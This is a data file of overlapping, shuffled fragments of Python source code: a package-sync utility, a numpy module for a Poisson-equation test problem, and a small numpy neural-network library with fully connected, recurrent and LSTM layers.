"tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run:", "[] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v)", "def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{% set version = \":", "from pathlib import Path from typing import Sequence, Mapping from tyrannosaurus.context import _Context", "\"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if", "-> None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v" ]
[ "data. asol : string Name of the variable on the grid. \"\"\" X,", "else: values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X) *", "* numpy.pi * Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2 *", "the right-hand side of the Poisson system. Arguments --------- grid : flowx.Grid object", "grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2", "values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2", "the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values =", "grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi", "= numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi * X)", "numpy.pi * X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid,", "* numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi *", "Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side", "--------- grid : flowx.Grid object Grid containing data. rvar : string Name of", "system. Arguments --------- grid : flowx.Grid object Grid containing data. rvar : string", "import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments", "flowx.Grid object Grid containing data. rvar : string Name of the variable on", "Grid containing data. asol : string Name of the variable on the grid.", "= numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y) else:", "* numpy.pi * X) * numpy.sin(2 * numpy.pi * Y) else: values =", "numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the", "* numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y)) grid.set_values(rvar,", "and set the analytical solution. Arguments --------- grid : flowx.Grid object Grid containing", "variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'):", "if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 *", "Grid containing data. rvar : string Name of the variable on the grid.", "(-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi", "X) * numpy.sin(2 * numpy.pi * Y)) else: values = (-8 * numpy.pi**2", ": flowx.Grid object Grid containing data. rvar : string Name of the variable", "grid : flowx.Grid object Grid containing data. asol : string Name of the", "simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution.", "* numpy.pi * X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def", "grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side of", "\"\"\"Compute and set the analytical solution. Arguments --------- grid : flowx.Grid object Grid", "numpy.pi * Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi", "* numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)) else: values =", "if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi *", "numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi * X)", "\"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 *", "* numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi * X) *", "the Poisson system. Arguments --------- grid : flowx.Grid object Grid containing data. rvar", "defined module for simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set", ": flowx.Grid object Grid containing data. asol : string Name of the variable", "* numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi *", "--------- grid : flowx.Grid object Grid containing data. asol : string Name of", "* X) * numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2 *", "asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments --------- grid : flowx.Grid", "else: values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi *", "values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side of the", "solution. Arguments --------- grid : flowx.Grid object Grid containing data. asol : string", "'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X) *", "Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 *", "def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side of the Poisson", "* X) * numpy.sin(2 * numpy.pi * Y)) else: values = (-8 *", "\"\"\"User defined module for simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and", "values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)", "values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2", "object Grid containing data. rvar : string Name of the variable on the", "grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8", "* numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set", "string Name of the variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x,", "rvar, user_bc): \"\"\"Compute and set the right-hand side of the Poisson system. Arguments", "numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)) else: values", "module for simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the", "grid : flowx.Grid object Grid containing data. rvar : string Name of the", "Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi *", "numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 *", "* numpy.sin(2 * numpy.pi * Y)) else: values = (-8 * numpy.pi**2 *", "'dirichlet'): values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi *", "* numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi *", "rvar : string Name of the variable on the grid. \"\"\" X, Y", "X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2", "object Grid containing data. asol : string Name of the variable on the", "numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)) else: values = (-8", "numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose())", "get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand side of the Poisson system.", "def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments --------- grid", "Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X)", "Name of the variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y)", ": string Name of the variable on the grid. \"\"\" X, Y =", "numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y) else: values", "== 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X)", "numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y))", "containing data. asol : string Name of the variable on the grid. \"\"\"", "Y) else: values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi", "the variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc ==", "\"\"\"Compute and set the right-hand side of the Poisson system. Arguments --------- grid", "grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2", "numpy.pi * X) * numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2", "* Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi *", "X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi", "the analytical solution. Arguments --------- grid : flowx.Grid object Grid containing data. asol", "X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc):", "* numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute", "set the analytical solution. Arguments --------- grid : flowx.Grid object Grid containing data.", "\"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 *", "set the right-hand side of the Poisson system. Arguments --------- grid : flowx.Grid", "= numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = (-8 * numpy.pi**2 * numpy.sin(2", "* Y) else: values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 *", "flowx.Grid object Grid containing data. asol : string Name of the variable on", "user_bc): \"\"\"Compute and set the right-hand side of the Poisson system. Arguments ---------", "= (-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2 *", "numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y))", "Poisson system. Arguments --------- grid : flowx.Grid object Grid containing data. rvar :", "numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2", "* numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)) else:", "user_bc): \"\"\"Compute and set the analytical solution. Arguments --------- grid : flowx.Grid object", "numpy.sin(2 * numpy.pi * Y)) else: values = (-8 * numpy.pi**2 * numpy.cos(2", "* Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and set the right-hand", "values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y)", "* X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar,", "right-hand side of the Poisson system. Arguments --------- grid : flowx.Grid object Grid", "data. rvar : string Name of the variable on the grid. \"\"\" X,", "X) * numpy.sin(2 * numpy.pi * Y) else: values = numpy.cos(2 * numpy.pi", "on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values", "of the variable on the grid. \"\"\" X, Y = numpy.meshgrid(grid.x, grid.y) if(user_bc", "Arguments --------- grid : flowx.Grid object Grid containing data. rvar : string Name", "= numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y) grid.set_values(asol,", "Arguments --------- grid : flowx.Grid object Grid containing data. asol : string Name", "asol : string Name of the variable on the grid. \"\"\" X, Y", "= (-8 * numpy.pi**2 * numpy.cos(2 * numpy.pi * X) * numpy.cos(2 *", "get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments --------- grid :", "numpy.meshgrid(grid.x, grid.y) if(user_bc == 'dirichlet'): values = numpy.sin(2 * numpy.pi * X) *", "for simulation.\"\"\" import numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical", "containing data. rvar : string Name of the variable on the grid. \"\"\"", "and set the right-hand side of the Poisson system. Arguments --------- grid :", "numpy def get_analytical(grid, asol, user_bc): \"\"\"Compute and set the analytical solution. Arguments ---------", "== 'dirichlet'): values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi", "numpy.cos(2 * numpy.pi * Y) grid.set_values(asol, values.transpose()) def get_rhs(grid, rvar, user_bc): \"\"\"Compute and", "numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y)) grid.set_values(rvar, values.transpose())", "(-8 * numpy.pi**2 * numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi", "side of the Poisson system. Arguments --------- grid : flowx.Grid object Grid containing", "analytical solution. Arguments --------- grid : flowx.Grid object Grid containing data. asol :", "of the Poisson system. Arguments --------- grid : flowx.Grid object Grid containing data." ]
[]
[ "for t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following", "dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in", "cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l]", "optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet:", "l in self.layers: l.init() def reset(self): for l in self.layers: l.reset() def add(self,", "= (cell[t - 1], dCell[t - 1]) if t > 0 else (c0,", "# dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t]", "** 2) ''' the following line sums the gradients over the entire batch", "layer ''' shape = None weights = None activation = None def reset(self):", ":, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t] =", "h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1]", "batch, 4 * self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if", "self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path): for i,l in", "self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None: c0", "rows and dY holds dY_i as its rows In other words, a product", "a previous call to softmax_loss function ''' return 1 class softmax_loss: ''' To", ":, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs':", "+ np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3", "dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)):", "if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0", "__call__(self, input): return 1 / (1 + np.exp(-input)) def d(self, input): return input", "as its rows In other words, a product of two matrices is a", "loss, dW, cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self,", "if 'hn' in cache[l] else None} time_steps, batch, out_ = out.shape dIn =", "= dH[t - 1] if t > 0 else dh0 dh += dInput[t,", "= previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1.", "is not None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None:", "= cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell =", "dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ =", "+= np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh =", "self.shape = shape def init(self, forget_bias_init=3): ''' forget bias initialization as seen in", "Connected layer ''' shape = None weights = None activation = None def", "- input * input class sigmoid: def __call__(self, input): return 1 / (1", "dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not None: dCell[-1]", "__init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget bias initialization as", "= [None] * self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()): if", "time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_", "l(out) return out def init(self): for l in self.layers: l.init() def reset(self): for", "self.cell = None def reset(self): self.previous = None self.cell = None def __call__(self,", "batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape)", "next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations']", "FCr: ''' Fully Connected recursive layer ''' shape = None weights = None", "1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws,", "single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for", "np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the", "derivative is covered by a previous call to softmax_loss function ''' return 1", "= np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not None: dCell[-1] +=", "cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch, out_ = out.shape dIn", "the last non-recursive layer ''' def __call__(self, input): shifted_ = input - np.max(input)", "self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0 def", "layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights =", "if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))):", "= np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 =", "used as the last non-recursive layer ''' def __call__(self, input): shifted_ = input", "None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input is", "self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache,", "= activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]]", "shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1])", "= self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps,", "np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: '''", "time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t", "inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell", "= None weights = None previous = None activation = None def __init__(self,", "def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] +", "np.tanh(input) def d(self, input): return 1 - input * input class sigmoid: def", "def reset(self): self.previous = None self.cell = None def __call__(self, input_tensor): outputs, cache", "1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0", "dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] #", "np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden'])", "self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :,", "= activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs':", "dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :,", "dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]])", "= 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_", "previous_cell = cells[t - 1] if t > 0 else c0 inputs[t, :,", "enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i))", "return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps,", "for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected", "= dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if", "self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]]", "and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] =", "return out def init(self): for l in self.layers: l.init() def reset(self): for l", "def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it", "non-recursive layer ''' def __call__(self, input): shifted_ = input - np.max(input) exp_ =", "cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out,", "= cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape)", "- cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] *", "dh0} class LSTM: ''' Long Short Term Memory layer Paper can be found", "train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None]", "inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0,", "dW, dIn, None class FCr: ''' Fully Connected recursive layer ''' shape =", "1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell = None def", "(dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely", "dH = dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t", "path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully", "'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs", "None def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget bias", "of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t]", "weights = None previous = None cell = None def __init__(self, shape): self.shape", "3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2)", "self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs =", "-> * stands for the dot product Now, we have (x_i) matrix and", "/ np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0:", "axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1) class softmax:", "reset(self): for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs,", "{'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs =", "np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return", "with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs,", "None class FCr: ''' Fully Connected recursive layer ''' shape = None weights", "dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW", "* self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]]", "Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is", "path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in", "= np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is None:", "as np class tanh: def __call__(self, input): return np.tanh(input) def d(self, input): return", "= input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws =", "1 class softmax_loss: ''' To be used in combination with sofmax ''' def", "dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if t >", "0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] =", "input_2) / np.size(input_1) class softmax: ''' Only to be used as the last", "pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def init(self,", "* stands for the dot product Now, we have (x_i) matrix and (dY_i)", "np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0", "= self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out)", "np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ =", "activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *=", ":, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ])", "* self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations':", "self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t,", "and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is", "dCell[t - 1]) if t > 0 else (c0, dc0) # dforget dAct[t,", "else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous *", "= [] num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self,", "products of columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T,", "input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_,", "dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t >", "numpy as np class tanh: def __call__(self, input): return np.tanh(input) def d(self, input):", "self.shape = shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] +", "time_steps): previous = outputs[t - 1] if t > 0 else h0 inputs[t,", "time_steps)): dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :, 2 *", "return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1", "= np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0):", "if t > 0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 *", "is to be a rank 3 tensor ''' out = input for l", "inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch,", "Long Short Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape", "time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations =", "def reset(self): self.previous = None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous)", ":, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] =", "train_on] -= 1 return tmp_ class rNet: layers = [] num_of_layers = None", "None weights = None previous = None activation = None def __init__(self, shape,", "inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1]", "layer ''' shape = None weights = None previous = None activation =", "self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]]", "self.shape[1]:] ** 2) ''' the following line sums the gradients over the entire", "scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out", "* dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if t", "previous call to softmax_loss function ''' return 1 class softmax_loss: ''' To be", ":, :] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t])", "= input for l in self.layers: out = l(out) return out def init(self):", "dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t])", "input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps,", "enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer ''' shape =", "* self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 *", "= self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut,", "'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None}", "softmax_loss function ''' return 1 class softmax_loss: ''' To be used in combination", "reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the", "'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in", "self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t] *", "line sums the gradients over the entire batch proof: Let x be a", "* dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t,", "0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous", "h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :,", "* dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t]", "1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] =", "def d(self, input): return 1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1", "/ (1 + np.exp(-input)) def d(self, 